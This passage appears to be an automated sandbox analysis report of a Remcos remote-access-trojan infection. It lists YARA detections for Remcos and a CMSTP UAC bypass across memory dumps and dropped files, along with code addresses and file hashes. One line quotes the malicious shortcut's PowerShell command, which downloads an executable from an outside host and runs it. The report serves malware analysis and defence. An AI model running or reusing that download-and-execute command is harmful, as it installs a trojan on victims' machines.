                      Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hello.exeJump to dropped file
                      Source: MdkbG2pK4l.lnkLNK file: /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile %APPDATA%/hello.exe && %APPDATA%/hello.exe
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB0D95 NtdllDefWindowProc_W,19_2_6FEB0D95
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB2932 _memset,NtdllDefWindowProc_W,19_2_6FEB2932
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEAE5F6 NtdllDefWindowProc_W,CallWindowProcW,19_2_6FEAE5F6
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.jobJump to behavior
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00404FAA11_2_00404FAA
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_0041206B11_2_0041206B
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_0041022D11_2_0041022D
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: 11_2_00411F9111_2_00411F91
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE25E7012_2_6FE25E70
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE263F012_2_6FE263F0
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE35FB712_2_6FE35FB7
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE3AE4512_2_6FE3AE45
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE43E3B12_2_6FE43E3B
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE31D8512_2_6FE31D85
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE25CA012_2_6FE25CA0
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE42CBB12_2_6FE42CBB
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE36C6C12_2_6FE36C6C
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE3686012_2_6FE36860
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE4586C12_2_6FE4586C
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE217D012_2_6FE217D0
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE4374312_2_6FE43743
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE2173012_2_6FE21730
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE2173912_2_6FE21739
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE3648C12_2_6FE3648C
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE431FF12_2_6FE431FF
                      Source: C:\Users\user\DZIPR.exeCode function: 12_2_6FE3708C12_2_6FE3708C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C915E7013_2_6C915E70
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C9163F013_2_6C9163F0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C92648C13_2_6C92648C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C932CBB13_2_6C932CBB
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C915CA013_2_6C915CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C926C6C13_2_6C926C6C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C921D8513_2_6C921D85
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C933E3B13_2_6C933E3B
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C92AE4513_2_6C92AE45
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C925FB713_2_6C925FB7
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C9117D013_2_6C9117D0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C91173113_2_6C911731
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C91173013_2_6C911730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C93374313_2_6C933743
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C92708C13_2_6C92708C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C92686013_2_6C926860
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C93586C13_2_6C93586C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 13_2_6C9331FF13_2_6C9331FF
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA5E7019_2_6FEA5E70
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA63F019_2_6FEA63F0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB5FB719_2_6FEB5FB7
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEBAE4519_2_6FEBAE45
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEC3E3B19_2_6FEC3E3B
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB1D8519_2_6FEB1D85
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA5CA019_2_6FEA5CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEC2CBB19_2_6FEC2CBB
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB6C6C19_2_6FEB6C6C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEC586C19_2_6FEC586C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB686019_2_6FEB6860
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA17D019_2_6FEA17D0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEC374319_2_6FEC3743
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA173019_2_6FEA1730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEA173119_2_6FEA1731
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB648C19_2_6FEB648C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEC31FF19_2_6FEC31FF
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 19_2_6FEB708C19_2_6FEB708C
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\lejp 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\paogviura 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6C9250C9 appears 65 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6FEB53BC appears 49 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6C9253BC appears 45 times
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: String function: 6FEB50C9 appears 65 times
                      Source: C:\Users\user\AppData\Roaming\hello.exeCode function: String function: 0040243B appears 37 times
                      Source: C:\Users\user\DZIPR.exeCode function: String function: 6FE350C9 appears 66 times
                      Source: C:\Users\user\DZIPR.exeCode function: String function: 6FE353BC appears 48 times
                      Source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
